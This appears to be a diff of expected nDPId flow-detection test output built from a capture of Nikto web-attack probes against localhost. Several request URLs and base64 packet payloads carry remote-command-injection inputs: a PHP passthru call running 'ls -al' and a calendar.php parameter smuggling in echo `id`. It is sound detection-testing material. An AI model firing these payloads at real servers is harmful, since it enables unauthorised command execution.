+01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00885{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"ts_msec":1576420277845,"pkt":"AAAAAAAAAAAAAAAACABFAAFouhJAAEAGgXt\/AAABfwAAAccuH5A6xYMmaghNdoAYAED\/XAAAAQEICp1m\/32dZv99R0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxNDAwKQ0KDQo="}
-01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001400)"}}
+01218{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001400)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277847,"pkt":"AAAAAAAAAAAAAAAACABFAADFXW9AAEAG3sF\/AAABfwAAAccwH5A6PWRZjzFeOIAYAED+uQAAAQEICp1m\/3+dZv9\/R0VUIC9tc2FkYy9tc2FkY3MuZGxsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDE0NzQpDQoNCg=="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/msadcs.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001474)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/msadcs.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001474)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277849,"pkt":"AAAAAAAAAAAAAAAACABFAADBYllAAEAG2dt\/AAABfwAAAccyH5AM9ltiiZJuH4AYAED+tQAAAQEICp1m\/4GdZv+AR0VUIC91cGxvYWRlci5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAxOCkNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uploader.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003018)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uploader.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003018)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00793{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"ts_msec":1576420277850,"pkt":"AAAAAAAAAAAAAAAACABFAAEkktVAAEAGqPx\/AAABfwAAAcc0H5D516vm6SxeZoAYAED\/GAAAAQEICp1m\/4KdZv+CR0VUIC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"}
-00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
+01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00802{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"ts_msec":1576420277851,"pkt":"AAAAAAAAAAAAAAAACABFAAEqh81AAEAGs\/5\/AAABfwAAAcc2H5Bgvr79vMi8roAYAED\/HgAAAQEICp1m\/4OdZv+DR0VUIC9mb3J1bS9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"}
-00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00804{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"ts_msec":1576420277854,"pkt":"AAAAAAAAAAAAAAAACABFAAErhnRAAEAGtVZ\/AAABfwAAAcc4H5AJP79Gqf4KlIAYAED\/HwAAAQEICp1m\/4adZv+GR0VUIC9mb3J1bXMvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="}
-00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forums\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forums\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00805{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"ts_msec":1576420277855,"pkt":"AAAAAAAAAAAAAAAACABFAAErbT9AAEAGzot\/AAABfwAAAcc6H5Be6VQGyl7\/vYAYAED\/HwAAAQEICp1m\/4edZv+HR0VUIC9mb3J1bXovY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="}
-00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumz\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumz\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}}
